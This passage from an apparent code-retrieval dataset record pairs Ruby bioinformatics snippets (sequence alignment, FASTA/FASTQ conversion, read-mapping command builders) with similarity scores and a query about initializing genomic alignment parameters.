"def alignmentMarkerLoad(inhash)\n \n log_info 'inhash', inhash # 1, 0\n if inhash[:sampleTypes] == 'DNA'\n alignment_markers = find(:item, sample: { name: MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] })\n elsif inhash[:sampleTypes] == 'RNA'\n alignment_markers = find(:item, { sample: { name: MARKERS[inhash[:type_ind]] } } )\n end\n log_info 'alignment marker ', alignment_markers\n alignment_marker=-1\n if(!(alignment_markers.nil?))\n alignment_marker=alignment_markers[0] \n end\n log_info 'alignment_marker', alignment_marker\n # marker currently in machine (location)\n # marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n # .find { |s| s.datum[:matrix][0][0] == alignment_marker.sample.id && s.location == \"Fragment analyzer\"} # old version\n \n # TODO: use check_alignment_marker function\n marker_in_analyzer = find(:item, object_type: {name: \"Stripwell\"}).find {|s| s.location == 'Fragment analyzer'}\n \n # is requested marker different from marker in machine?\n different_marker =! (alignment_markers.include?(marker_in_analyzer))\n \n # old marker?\n old_marker=( (marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true) )\n \n # need to replace? \n marker_needs_replacing = (old_marker) || (different_marker)\n \n # new alignment marker\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n \n if(debug) \n show do\n title \"DEBUG\"\n note \"marker_in_analyzer=#{marker_in_analyzer}\"\n note \"different marker = #{different_marker}\"\n note \"marker_needs_replacing = #{marker_needs_replacing}\"\n note \"looking for #{MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]]}\"\n note \"alignment_marker_stripwell = #{alignment_marker_stripwell}\"\n end\n end\n\n # replace alignment marker\n if(marker_needs_replacing && alignment_marker_stripwell) \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the <b>Load Position</b> icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n if old_marker\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n end\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.save\n if(old_marker) # replaced because old one was outdated\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime \n alignment_marker_stripwell.save\n release [alignment_marker_stripwell] \n marker_in_analyzer.mark_as_deleted # trash outdated marker\n else # move current marker to SF2 (small fridge 2)\n marker_in_analyzer.location = \"SF2\"\n marker_in_analyzer.save\n end\n end\n end",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def align(align=nil)\n @options[:align] = align unless align.nil?\n @options[:align]\n end",
"def dna_align_features(analysis_name = nil)\n \tif analysis_name.nil?\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s)\n else\n analysis = Analysis.find_by_logic_name(analysis_name)\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s + ' AND analysis_id = ' + analysis.id.to_s)\n end\n end",
"def getDna (cds, seq)\n loc = cds.locations\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n end\n dna = Bio::Sequence.auto(fasta)\n return dna\nend",
"def align_all_local\n @results = []\n @proteins.each { |protein|\n @results << align_local(protein)\n }\n @results = @results.sort_by { |evaluated_protein| evaluated_protein.value }\n end",
"def fastafile_to_fastastring(filename)\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, filename) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n return oa.output(:fasta)\n\n end",
"def alignment_of(member)\n self::MEMBERS_HASH[member].alignment\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def align=(align)\n set_align(align)\n generate_buffers\n end",
"def get_4d_simplealign\n raise \"not implemented\"\n end",
"def option_align\n @align = true\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def align_column n, alignment\n r = rows\n column(n).each_with_index do |col, i|\n r[i][n] = { :value => col, :alignment => alignment } unless Hash === col\n end\n end",
"def on_process_sequence(seq_name,seq_fasta)\n # subclasses may override this method\n end",
"def align_all_words\n 0.upto(word_list.length-1) do |i|\n 0.upto(i-1) do |j|\n w1 = self[i]\n w2 = self[j]\n if (w1.meaning & w2.meaning).empty?\n LOGGER.debug(\"Skipping alignment for\\n\" +\n \"#{w1}\\n#{w2}\\nbecause they share no meaning\")\n next\n end\n @alignment_table.add(Alignment.new(w1, w2), i, j)\n end\n end\n end",
"def aligned?\n true\n end",
"def dna_align_features(analysis_name = nil)\r\n \tif analysis_name.nil?\r\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s)\r\n else\r\n analysis = Analysis.find_by_logic_name(analysis_name)\r\n return DnaAlignFeature.find_by_sql('SELECT * FROM dna_align_feature WHERE seq_region_id = ' + self.seq_region.id.to_s + ' AND seq_region_start >= ' + self.start.to_s + ' AND seq_region_end <= ' + self.stop.to_s + ' AND analysis_id = ' + analysis.id.to_s)\r\n end\r\n end",
"def mrna\n unless defined?(@mrna)\n @mrna = SeqDesc.parse(@d0.find { |x| /^mRNA\\:/ =~ x })\n end\n @mrna\n end",
"def alignContinuations(theLines)\n\n\tsplitAndAlign(theLines, /^(.*?)\\s+(\\\\)$/, \"\");\n\nend",
"def [](index)\n alignments.fetch(index, DEFAULT)\n end",
"def align_sequences_nm(sequence1, sequence2, scores)\n # Dynamic programming.\n dp = Array.new(sequence1.length + 1) { Array.new(sequence2.length + 1) }\n gap_score = scores['-']['-']\n dp[0][0] = [0, 0, 0, '|', '|']\n sequence1.chars.each_with_index do |c, i|\n dp[i + 1][0] = [(i + 1) * gap_score, 1, 0, c, '-']\n end\n sequence2.chars.each_with_index do |c, j|\n dp[0][j + 1] = [(j + 1) * gap_score, 0, 1, '-', c]\n end\n sequence1.chars.each_with_index do |base1, i|\n sequence2.chars.each_with_index do |base2, j|\n dp[i + 1][j + 1] = [[0, 1, '-', base2], [1, 0, '-', base1],\n [1, 1, base1, base2]].map { |i1, j1, match1, match2|\n [dp[i - i1 + 1][j - j1 + 1].first + scores[match1][match2],\n i1, j1, match1, match2]\n }.max\n end\n end\n \n # Solution reconstruction.\n i, j = *[sequence1, sequence2].map(&:length)\n match_score = dp[i][j].first\n align1, align2 = '', ''\n until i == 0 && j == 0\n score, i1, j1, base1, base2 = *dp[i][j]\n align1 << base1; i -= i1 \n align2 << base2; j -= j1\n end\n \n # Return values\n scores = dp.map { |line| line.map(&:first) }\n words = { [1, 0] => '$\\\\uparrow$', [0, 1] => '$\\\\leftarrow$',\n [1, 1] => '$\\\\nwarrow$', [0, 0] => '$\\\\cdot$'}\n parents = dp.map { |line| line.map { |item| words[item[1, 2]] } }\n { :scores => scores, :parents => parents, :match_score => match_score,\n :aligns => [align1, align2].map(&:reverse) }\nend",
"def rna_to_amino_acid(rna)\n # Protein Translation Problem: Translate an RNA string into an amino acid string.\n # Input: An RNA string Pattern and the array GeneticCode.\n # Output: The translation of Pattern into an amino acid string Peptide. \n\n r_to_c_h = rna_to_codon_hash\n # puts r_to_c_h\n i = 0\n codon_length = 3\n amino_acid = \"\"\n while (codon = rna.slice(i, codon_length)) do\n # puts codon\n # puts r_to_c_h[codon.to_sym]\n break if codon.empty?\n amino_acid += r_to_c_h[codon.to_sym].to_s\n i += codon_length\n end\n return amino_acid\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def get_aligned_data(n)\n # n must be aligned\n res, @data = @data.unpack(\"a#{n}a*\")\n self.underrun! unless res\n res\n end",
"def text_align(alignment)\n Kernel.raise ArgumentError, \"Unknown alignment constant: #{alignment}\" unless ALIGN_TYPE_NAMES.key?(alignment.to_i)\n primitive \"text-align #{ALIGN_TYPE_NAMES[alignment.to_i]}\"\n end",
"def alignment_node(node)\n ancestor_node = ancestor_node(node)\n\n return ancestor_node if ancestor_node.nil? ||\n ancestor_node.kwbegin_type?\n\n assignment_node = assignment_node(ancestor_node)\n return assignment_node if same_line?(ancestor_node, assignment_node)\n\n access_modifier_node = access_modifier_node(ancestor_node)\n return access_modifier_node unless access_modifier_node.nil?\n\n ancestor_node\n end",
"def transform_anchors( str, rs )\n\t\t\t@log.debug \" Transforming anchors\"\n\t\t\t@scanner.string = str.dup\n\t\t\ttext = ''\n\n\t\t\t# Scan the whole string\n\t\t\tuntil @scanner.empty?\n\n\t\t\t\tif @scanner.scan( /\\[/ )\n\t\t\t\t\tlink = ''; linkid = ''\n\t\t\t\t\tdepth = 1\n\t\t\t\t\tstartpos = @scanner.pos\n\t\t\t\t\t@log.debug \" Found a bracket-open at %d\" % startpos\n\n\t\t\t\t\t# Scan the rest of the tag, allowing unlimited nested []s. If\n\t\t\t\t\t# the scanner runs out of text before the opening bracket is\n\t\t\t\t\t# closed, append the text and return (wasn't a valid anchor).\n\t\t\t\t\twhile depth.nonzero?\n\t\t\t\t\t\tlinktext = @scanner.scan_until( /\\]|\\[/ )\n\n\t\t\t\t\t\tif linktext\n\t\t\t\t\t\t\t@log.debug \" Found a bracket at depth %d: %p\" % [ depth, linktext ]\n\t\t\t\t\t\t\tlink += linktext\n\n\t\t\t\t\t\t\t# Decrement depth for each closing bracket\n\t\t\t\t\t\t\tdepth += ( linktext[-1, 1] == ']' ? -1 : 1 )\n\t\t\t\t\t\t\t@log.debug \" Depth is now #{depth}\"\n\n\t\t\t\t\t\t# If there's no more brackets, it must not be an anchor, so\n\t\t\t\t\t\t# just abort.\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t@log.debug \" Missing closing brace, assuming non-link.\"\n\t\t\t\t\t\t\tlink += @scanner.rest\n\t\t\t\t\t\t\t@scanner.terminate\n\t\t\t\t\t\t\treturn text + '[' + link\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tlink.slice!( -1 ) # Trim final ']'\n\t\t\t\t\t@log.debug \" Found leading link %p\" % link\n\n\n\n\t\t\t\t\t# Markdown Extra: Footnote\n\t\t\t\t\tif link =~ /^\\^(.+)/ then\n\t\t\t\t\t\tid = $1\n\t\t\t\t\t\tif rs.footnotes[id] then\n\t\t\t\t\t\t\trs.found_footnote_ids << id\n\t\t\t\t\t\t\tlabel = \"[#{rs.found_footnote_ids.size}]\"\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\trs.warnings << \"undefined footnote id - #{id}\"\n\t\t\t\t\t\t\tlabel = '[?]'\n\t\t\t\t\t\tend\n\n\t\t\t\t\t\ttext += %Q|<sup id=\"footnote-ref:#{id}\"><a href=\"#footnote:#{id}\" rel=\"footnote\">#{label}</a></sup>|\n\n\t\t\t\t\t# Look for a reference-style second part\n\t\t\t\t\telsif @scanner.scan( RefLinkIdRegexp )\n\t\t\t\t\t\tlinkid = @scanner[1]\n\t\t\t\t\t\tlinkid = link.dup if linkid.empty?\n\t\t\t\t\t\tlinkid.downcase!\n\t\t\t\t\t\t@log.debug \" Found a linkid: %p\" % linkid\n\n\t\t\t\t\t\t# If there's a matching link in the link table, build an\n\t\t\t\t\t\t# anchor tag for it.\n\t\t\t\t\t\tif rs.urls.key?( linkid )\n\t\t\t\t\t\t\t@log.debug \" Found link key in the link table: %p\" % rs.urls[linkid]\n\t\t\t\t\t\t\turl = escape_md( rs.urls[linkid] )\n\n\t\t\t\t\t\t\ttext += %{<a href=\"#{url}\"}\n\t\t\t\t\t\t\tif rs.titles.key?(linkid)\n\t\t\t\t\t\t\t\ttext += %{ title=\"%s\"} % escape_md( rs.titles[linkid] )\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\ttext += %{>#{link}</a>}\n\n\t\t\t\t\t\t# If the link referred to doesn't exist, just append the raw\n\t\t\t\t\t\t# source to the result\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t@log.debug \" Linkid %p not found in link table\" % linkid\n\t\t\t\t\t\t\t@log.debug \" Appending original string instead: \"\n\t\t\t\t\t\t\t@log.debug \"%p\" % @scanner.string[ startpos-1 .. @scanner.pos-1 ]\n\n\t\t\t\t\t\t\trs.warnings << \"link-id not found - #{linkid}\"\n\t\t\t\t\t\t\ttext += @scanner.string[ startpos-1 .. @scanner.pos-1 ]\n\t\t\t\t\t\tend\n\n\t\t\t\t\t# ...or for an inline style second part\n\t\t\t\t\telsif @scanner.scan( InlineLinkRegexp )\n\t\t\t\t\t\turl = @scanner[1]\n\t\t\t\t\t\ttitle = @scanner[3]\n\t\t\t\t\t\t@log.debug \" Found an inline link to %p\" % url\n\n\t\t\t\t\t\turl = \"##{link}\" if url == '#' # target anchor briefing (since AoBane 0.40)\n\n\t\t\t\t\t\ttext += %{<a href=\"%s\"} % escape_md( url )\n\t\t\t\t\t\tif title\n\t\t\t\t\t\t\ttitle.gsub!( /\"/, \""\" )\n\t\t\t\t\t\t\ttext += %{ title=\"%s\"} % escape_md( title )\n\t\t\t\t\t\tend\n\t\t\t\t\t\ttext += %{>#{link}</a>}\n\n\t\t\t\t\t# No linkid part: just append the first part as-is.\n\t\t\t\t\telse\n\t\t\t\t\t\t@log.debug \"No linkid, so no anchor. Appending literal text.\"\n\t\t\t\t\t\ttext += @scanner.string[ startpos-1 .. @scanner.pos-1 ]\n\t\t\t\t\tend # if linkid\n\n\t\t\t\t# Plain text\n\t\t\t\telse\n\t\t\t\t\t@log.debug \" Scanning to the next link from %p\" % @scanner.rest\n\t\t\t\t\ttext += @scanner.scan( /[^\\[]+/ )\n\t\t\t\tend\n\n\t\t\tend # until @scanner.empty?\n\n\t\t\treturn text\n\t\tend",
"def aligned?\n false\n end",
"def aligned?\n false\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def getDna (cds, seq)\n loc = cds.locations\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n end\n dna = Bio::Sequence.auto(fasta)\n return dna\n end",
"def update_anchor_create_loc(_bib, eref, docid)\n ins = eref.at(ns(\"./localityStack\")) or return\n type = ins.at(ns(\"./locality/@type\"))&.text\n type = \"clause\" if type == \"annex\"\n ref = ins.at(ns(\"./locality/referenceFrom\"))&.text\n #anchor = @files[docid][:anchors].dig(type, ref) or return\n anchor = @files.get(docid,:anchors).dig(type, ref) or return\n ins << \"<locality type='anchor'><referenceFrom>#{anchor.sub(/^_/, '')}\" \\\n \"</referenceFrom></locality>\"\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def translate(codon)\n x = Bio::Sequence::NA.new(codon)\n a = x.translate # or a = x.translate.codes \n return a\nend"
] |
[
"0.64750266",
"0.6085275",
"0.5994836",
"0.5935136",
"0.5934424",
"0.58259934",
"0.5712599",
"0.5695768",
"0.5645835",
"0.55811363",
"0.55595046",
"0.55595046",
"0.5535473",
"0.55088663",
"0.5488692",
"0.5471203",
"0.529536",
"0.5294155",
"0.52850974",
"0.5182773",
"0.515628",
"0.51434433",
"0.5137801",
"0.51301676",
"0.51238257",
"0.51238257",
"0.5110673",
"0.5086346",
"0.5062525",
"0.5042349",
"0.5038231",
"0.5020377",
"0.49903986",
"0.49839202",
"0.49736342",
"0.49660224",
"0.49485332",
"0.49476635",
"0.49450353",
"0.49391052",
"0.49007687",
"0.48859125",
"0.48859125",
"0.4870976",
"0.4853533",
"0.4851359",
"0.48475823",
"0.4840898",
"0.48361924",
"0.48349532",
"0.48115295",
"0.4807929",
"0.48067456",
"0.48013133",
"0.47986242",
"0.47680283",
"0.47668055",
"0.47448128",
"0.47236645",
"0.47196573",
"0.4706326",
"0.46965232",
"0.46911865",
"0.46686563",
"0.46595845",
"0.46188384",
"0.45977825",
"0.4588146",
"0.45881328",
"0.45854735",
"0.4582038",
"0.4578386",
"0.45757353",
"0.45739105",
"0.45712733",
"0.45612547",
"0.45565084",
"0.45564032",
"0.45521426",
"0.4551186",
"0.45470816",
"0.45419976",
"0.45398483",
"0.45272803",
"0.4515012",
"0.45091712",
"0.449412",
"0.44940704",
"0.44802955",
"0.4458519",
"0.4458212",
"0.4457093",
"0.44457522",
"0.44429055",
"0.44429055",
"0.44421718",
"0.44398886",
"0.44320858",
"0.44294125",
"0.44194305"
] |
0.55670184
|
10
|
Initializes genomic alignment parameters annotation genomic annotation, needed for splicing awareness tophat_aligner software that Tophat uses (bowtie2 or bowtie1) mismatches max number of allowed mismatches in Tophat alignment err error rate for STAR / bucketizing
|
def initialize(names, force_overwrite, ref, software,
annotation, tophat_aligner, mismatches, err_rate)
super(names, force_overwrite, ref, software)
@annotation = annotation
@tophat_aligner = tophat_aligner
@mismatches = mismatches
@err_rate = err_rate
@mapped_bams = []
@unmapped_bams = []
@max_mismatches = 0
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def initializeDefaultParameters()\n @phasing = 0\n @prePhasing = 0\n @yield = 0\n @percentPFReads = 0 # Percentage of purity filtered reads\n @numRawReads = 0 # Number of raw reads\n @numPFReads = 0 # Number of purity filtered reads\n @referencePath = \"\"\n @percentAligned = 0\n @percentError = 100\n @firstCycleInt = 0 # First cycle intensity\n @percentIntAfter20 = 0 # Percent intensity after 20 cycles\n @percentPerfectIndex = 0 # Percent of index reads matching perfectly\n @percent1MismatchIndex = 0 # Percentage of index reads with 1 mismatch\n @percentQ30Bases = 0 # Percentage of bases with Q30 or higher\n @meanQualScore = 0 # Mean quality score\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
